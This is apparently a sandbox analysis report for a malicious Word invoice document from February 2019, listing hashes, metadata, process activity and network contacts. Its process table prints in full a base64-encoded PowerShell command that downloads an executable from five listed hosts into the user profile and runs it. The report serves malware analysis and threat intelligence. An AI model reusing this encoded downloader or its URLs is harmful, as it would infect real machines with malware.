File name: | INV-2019-0519-07-02-2019.doc |
Full analysis: | https://app.any.run/tasks/6db89967-5b3f-4fa8-a0a3-74531c054b22 |
Verdict: | Malicious activity |
Analysis date: | February 18, 2019, 16:36:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 14:23:00 2019, Last Saved Time/Date: Mon Feb 18 14:23:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | ABA79B239F83717CB31A3B66A4F9B483 |
SHA1: | 33695C7CF4FA921D8D0BCEC1DF2CB8E773CF2D00 |
SHA256: | 88CD332B15627991A0E6F7A580A9580B8D30C9FA083AEB80DC2354E940F716B5 |
SSDEEP: | 6144:ZG5/BnVfRFJ7KK9aHScdX9znGU/Nu6kvIOSZbO4Vc7co7ta1hw++u+:Z2n9R/lA5dX9znGU/3kvIPO4VYp7ta18 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:02:18 14:23:00 |
ModifyDate: | 2019:02:18 14:23:00 |
Pages: | 1 |
Words: | 1 |
Characters: | 7 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 7 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3016 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INV-2019-0519-07-02-2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2608 | powersheLl -e JABuAF8AXwA0AF8AXwAwADkAPQAoACcARwBfACcAKwAnADcAMgA3ADAAJwApADsAJABVAF8AMwAwADEAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6ADkAXwBfADUANAAwAD0AKAAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AMQAnACsAJwAzADkALgA1ACcAKwAnADkALgAnACsAJwA2ADQALgAnACsAJwAxADcAMwAvAEcAJwArACcATgBzACcAKwAnAGQAOABIAEcAYgAnACsAJwBFACcAKwAnAHQAJwArACcAQABoAHQAdABwACcAKwAnADoALwAvADEAMQA4ACcAKwAnAC4AJwArACcAMgA1AC4AMQA3ADYALgAzADgALwBzAHAAJwArACcATAB4AEYAWgBEAFcAJwArACcAQwB5AEAAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwAxADMALgAyADMAMwAuACcAKwAnADMAMQAuADIAMAAnACsAJwAzAC8AJwArACcAcABOAHUAJwArACcAWQBNAEkAUwAnACsAJwBTAEAAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwAnACsAJwBhAGwAbABlACcAKwAnAG4AcwAnACsAJwAuAHkAJwArACcAbwB1AGMAaABlACcAKwAnAGMAawBpACcAKwAnAHQAJwArACcALgBjAGEALwB5ACcAKwAnAFYAJwArACcAeABFAHYAJwArACcAMQAnACsAJwA5AEAAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwAxADMAJwArACcALgAxACcAKwAnADIAJwArACcANgAuADYAMQAnACsAJwAuADEAMQAvADcAeQB4ACcAKwAnAHQAbABzAFYAUAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABpAF8ANQA0ADEAMQA4AD0AKAAnAE0AJwArACcANwA3AF8ANAAzACcAKQA7ACQAawAyADcAMgBfAF8AMgAgAD0AIAAoACcAOAA5ACcAKwAnADkAJwApADsAJABkAF8AOAA2ADcANwBfAD0AKAAnAGgAJwArACcANAAxADEAJwArACcANwAzADMAJwApADsAJABXADQAMwAyAF8AOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAawAyADcAMgBfAF8AMgArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAG0ANQBfAF8ANQA3ACAAaQBuACAAJAB6ADkAXwBfADUANAAwACkAewB0AHIAeQB7ACQAVQBfADMAMAAxAF8ALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQA1AF8AXwA1ADcALAAgACQAVwA0ADMAMgBfADgAKQA7ACQAYgA4AF8AXwBfADQAXwA3AD0AKAAnAE0AXwAwADgAJwArACcAOABfACcAKwAnADIAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAVwA0ADMAMgBfADgAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABXADQAMwAyAF8AOAA7ACQATgA2AF8AOAAwADcAPQAoACcARQAzACcAKwAnADEANABfAF8ANgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAagAwADIANAA5ADEAPQAoACcARQAwAF8AMAAnACsAJwA4ADMAJwApADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3016 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6BBB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2608 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1LOPPJNPM3PA1OFIZGSX.temp | — | |
MD5:— | SHA256:— | |||
3016 | WINWORD.EXE | C:\Users\admin\Desktop\~$V-2019-0519-07-02-2019.doc | pgc | |
MD5:5F1F17FD24AD406E752D9F6D55EE6E0B | SHA256:237CFAE016F6E26A6CF1715586DD159821F40BA122403EB8F425F29EBE9DB418 | |||
2608 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247a22.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2608 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:E1DA643C973BCCB61CE3DEC090921513 | SHA256:1250DC28F882033E1A3DE28DEC85663C315655D3A4F093B925F4A84BE0B0A10D | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INV-2019-0519-07-02-2019.doc.LNK | lnk | |
MD5:99ACF2B25BDBBA01DC2F3B31408105CE | SHA256:19081D7D083EDE68FC1388064B474B21FAA771DD661929E0FF10F583EC4886FB | |||
3016 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B0E727756D2E0BADB5367093BF613C2A | SHA256:EB25C272C7FB4D5F9DC594F2708BF28130364853D57B17E3AD5943E93E442EBC |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2608 | powersheLl.exe | GET | 404 | 139.59.64.173:80 | http://139.59.64.173/GNsd8HGbEt | IN | xml | 345 b | suspicious |
2608 | powersheLl.exe | GET | 404 | 13.233.31.203:80 | http://13.233.31.203/pNuYMISS | IN | xml | 345 b | suspicious |
2608 | powersheLl.exe | GET | 404 | 118.25.176.38:80 | http://118.25.176.38/spLxFZDWCy | CN | xml | 345 b | malicious |
2608 | powersheLl.exe | GET | 404 | 138.197.128.108:80 | http://allens.youcheckit.ca/yVxEv19 | CA | xml | 345 b | malicious |
2608 | powersheLl.exe | GET | 404 | 13.126.61.11:80 | http://13.126.61.11/7yxtlsVP | IN | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2608 | powersheLl.exe | 139.59.64.173:80 | — | Digital Ocean, Inc. | IN | suspicious |
2608 | powersheLl.exe | 13.233.31.203:80 | — | Amazon.com, Inc. | IN | suspicious |
2608 | powersheLl.exe | 138.197.128.108:80 | allens.youcheckit.ca | Digital Ocean, Inc. | CA | malicious |
2608 | powersheLl.exe | 118.25.176.38:80 | — | — | CN | malicious |
2608 | powersheLl.exe | 13.126.61.11:80 | — | Amazon.com, Inc. | IN | unknown |
Domain | IP | Reputation |
---|---|---|
allens.youcheckit.ca |
| malicious |